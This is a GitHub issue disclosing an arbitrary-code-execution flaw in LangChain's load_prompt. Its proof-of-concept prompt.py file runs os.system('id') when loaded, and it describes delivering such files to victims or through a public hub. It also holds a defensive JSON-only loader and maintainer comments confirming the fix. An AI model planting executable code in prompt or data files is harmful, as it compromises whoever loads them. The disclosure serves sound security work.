
Arbitrary code execution in load_prompt #4849

0gur1 opened this issue May 17, 2023 · 2 comments

0gur1 commented May 17, 2023

System Info

LangChain version:0.0.171
windows 10

Who can help?

No response

Information

  • The official example notebooks/scripts
  • My own modified scripts

Related Components

  • LLMs/Chat Models
  • Embedding Models
  • Prompts / Prompt Templates / Prompt Selectors
  • Output Parsers
  • Document Loaders
  • Vector Stores / Retrievers
  • Memory
  • Agents / Agent Executors
  • Tools / Toolkits
  • Chains
  • Callbacks/Tracing
  • Async

Reproduction

  1. A python prompt file prompt.py:

```python
from langchain.output_parsers.list import CommaSeparatedListOutputParser
from langchain.prompts.prompt import PromptTemplate
_DECIDER_TEMPLATE = """Given the below input question and list of potential tables, output a comma separated list of the table names that may be neccessary to answer this question.

Question: {query}

Table Names: {table_names}

Relevant Table Names:"""

import os
os.system('id')
PROMPT = PromptTemplate(
    input_variables=["query", "table_names"],
    template=_DECIDER_TEMPLATE,
    output_parser=CommaSeparatedListOutputParser(),
)
```

  2. Load the prompt with the load_prompt function:

```python
from langchain.prompts import load_prompt
load_prompt('prompt.py')
```

  3. The id command will be executed.

Attack scenario 1: Alice can send a prompt file to Bob and get Bob to load it.
Attack scenario 2: Alice uploads the prompt file to a public hub such as 'langchain-hub'. Bob loads the prompt from a URL.

Expected behavior

The code cannot be executed without any check.
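The root cause in the report above is that a prompt loader which accepts `.py` files has to import them, which runs any module-level code. The mitigation is to treat prompt files as data only: accept just declarative formats, parse them with a non-executing parser, and validate the fields before building a template. The following is an added example written for this issue; it is not LangChain's `load_prompt` and not code from the reporter. It assumes a prompt is a JSON object with `template` and `input_variables` (the same two fields the PoC passes to `PromptTemplate`), and it uses a small `MinimalPromptTemplate` stand-in so it runs without LangChain installed. The `.py` file written in `demo()` is a constructed, harmless placeholder; it is rejected by suffix before it is ever opened.

```python
"""Added example: a prompt loader that refuses executable prompt formats.

Illustrative code for this issue, not LangChain's own load_prompt.
Assumptions: a prompt file is a JSON object with the keys "template" and
"input_variables"; MinimalPromptTemplate stands in for langchain's
PromptTemplate. YAML would be handled the same way via yaml.safe_load
(PyYAML assumed), never via import/exec.
"""
import json
import os
import string
import tempfile
from dataclasses import dataclass, field

# Only declarative formats are accepted. A .py prompt would have to be
# imported to be loaded, which executes module-level code, so it is refused.
ALLOWED_SUFFIXES = {".json"}


class UnsafePromptFormat(ValueError):
    """Raised when loading a prompt file would require executing code."""


@dataclass
class MinimalPromptTemplate:
    """Stand-in for langchain's PromptTemplate (assumption, not the real class)."""
    template: str
    input_variables: list = field(default_factory=list)

    def format(self, **kwargs):
        return self.template.format(**kwargs)


def is_allowed_prompt_path(path: str) -> bool:
    """Suffix allowlist check; case-insensitive so 'PROMPT.PY' is also refused."""
    return os.path.splitext(path)[1].lower() in ALLOWED_SUFFIXES


def template_placeholders(template: str) -> set:
    """Return the {placeholder} names referenced by a str.format template."""
    return {name for _, name, _, _ in string.Formatter().parse(template) if name}


def safe_load_prompt(path: str) -> MinimalPromptTemplate:
    """Load a prompt from a data file without executing anything from it."""
    if not is_allowed_prompt_path(path):
        raise UnsafePromptFormat(
            f"refusing to load {path!r}: only {sorted(ALLOWED_SUFFIXES)} prompt files are accepted"
        )
    with open(path, "r", encoding="utf-8") as fh:
        data = json.load(fh)  # pure data parsing; no code path can run here
    if not isinstance(data, dict) or not isinstance(data.get("template"), str):
        raise ValueError("prompt file must be a JSON object with a string 'template'")
    input_variables = data.get("input_variables", [])
    if not isinstance(input_variables, list) or not all(isinstance(v, str) for v in input_variables):
        raise ValueError("'input_variables' must be a list of strings")
    # Cross-check declared variables against the template so a malformed or
    # tampered file fails at load time instead of at format time.
    declared, used = set(input_variables), template_placeholders(data["template"])
    if declared != used:
        raise ValueError(
            f"input_variables {sorted(declared)} do not match template placeholders {sorted(used)}"
        )
    return MinimalPromptTemplate(template=data["template"], input_variables=input_variables)


def demo() -> dict:
    """Write one constructed JSON prompt and one constructed .py file, then load both."""
    tmp_dir = tempfile.mkdtemp(prefix="prompt_demo_")
    good = os.path.join(tmp_dir, "decider_prompt.json")
    with open(good, "w", encoding="utf-8") as fh:
        json.dump({
            "template": "Question: {query}\nTable Names: {table_names}\nRelevant Table Names:",
            "input_variables": ["query", "table_names"],
        }, fh)
    bad = os.path.join(tmp_dir, "prompt.py")
    with open(bad, "w", encoding="utf-8") as fh:
        fh.write("print('placeholder')\n")  # constructed, harmless; refused by suffix regardless of content
    results = {"json": safe_load_prompt(good).format(query="q", table_names="t")}
    try:
        safe_load_prompt(bad)
        results["py"] = "loaded"
    except UnsafePromptFormat:
        results["py"] = "rejected"
    return results


if __name__ == "__main__":
    print(demo())
```

The allowlist is checked on the suffix before the file is opened, so the decision does not depend on file contents at all; the same check should sit in front of any URL-based loading, since a hub download is just another untrusted file. If YAML support is needed, parse it with `yaml.safe_load` and run it through the same field validation; never fall back to importing a module for "unknown" formats.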

@hwchase17
Contributor

moved to experimental, should be good!

@obi1kenobi
Collaborator

Closing the loop here: the affected code was deleted in #8425 and that change was released in langchain v0.0.247.

Version v0.0.247 and newer do not have this issue.

obi1kenobi added a commit to obi1kenobi/advisory-database that referenced this issue Aug 29, 2023
The referenced issue has been closed and this comment within it confirms the fix has been published: langchain-ai/langchain#4849 (comment)
oliverchang pushed a commit to pypa/advisory-database that referenced this issue Aug 30, 2023
The referenced issue has been closed and this comment within it confirms the fix has been published: langchain-ai/langchain#4849 (comment)